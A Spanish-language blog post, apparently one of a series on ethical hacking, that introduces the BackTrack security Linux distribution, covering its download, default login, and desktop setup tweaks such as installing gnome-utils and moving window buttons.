Pasemos a ver BackTrack:
Por si no lo tienes aún, para descargar Backtrack puedes realizarlo desde http://www.backtrack-linux.org/downloads/
Como ya comenté aquí, está disponible para arquitecturas tanto de 32 como de 64 bits, y con KDE o GNOME. Personalmente utilizo GNOME por estar familiarizado con Ubuntu (Backtrack está basado en Ubuntu).
Una vez arrancado Backtrack desde el CD (o montado como un pendrive), obtendremos un prompt (línea de comandos). En ella escribiremos “startx” para arrancar el entorno gráfico (previamente nos logueamos con “root” y “toor” como usuario y contraseña respectivamente).
Obtendremos un escritorio como el que vemos a continuación:


Una vez instalado Backtrack (si lo prefieres puedes usarlo como Live CD), hay varias cosas que yo aconsejo hacer (suponiendo que has escogido GNOME). Veamos algunas de ellas:
  1. Instalar “gnome-utils”. Con ello podremos realizar capturas de pantalla entre otras utilidades. Para ello abrimos un terminal y escribiremos: apt-get install gnome-utils
  2. Actualizar Firefox. La versión que viene por defecto ya no es la más reciente (versión 5). Para actualizarla abrimos Firefox (Applications > Internet > Firefox Web Browser). Accedemos a la pestaña Help > About Firefox y desde ahí podremos actualizarlo fácilmente.
  3. Reajustar la hora. No sé por qué nunca se me configura de inicio bien la hora y localización. Esto podremos solucionarlo haciendo click con el botón derecho en la hora (localizada arriba en el panel) y pulsar en Preferences. Ahora en la pestaña Location, le damos a Add y añadimos nuestra ciudad para que se configure bien la hora.
  4. Cambiar los iconos de minimizar, maximizar y cerrar a la derecha. Como podréis observar, estos iconos se encuentran en la esquina superior izquierda de cada ventana. Para la mayoría de ustedes, os resultará cuanto menos, incómodo. Si queremos cambiarlos a la derecha debemos hacerlos lo siguiente.
    1. Instalar gconf-editor. Para ello en un terminal: apt-get install gconf-editor
    2. Pulsar Alt + F2 y escribir gconf-editor. Ahora, a la izquierda, accedemos a /apps/metacity/general/button_layout
    3. Tenemos que modificar el valor que tiene por el siguiente: “:minimize,maximize,close” (sin comillas). Con ello ya hemos cambiado los iconos a la derecha.

Pasemos a analizar qué nos brinda Backtrack. Como podemos observar en el menú superior, disponemos de tres pestaña (clásico en GNOME). Las pestañas Places y System no las voy a explicar debido a que son iguales que en cualquier otra distribución con GNOME.
Dentro de la pestaña Applications, la opción que nos interesa es BackTrack. En ella, las herramientas están perfectamente clasificadas según su orientación:

Hasta aquí por hoy, en la próxima entregamos comenzaremos a ver cómo están estas aplicaciones organizadas y veremos algunas de ellas.
Saludos! BackTrack BackTrack (8)!!!!
Fuente: hacking-etico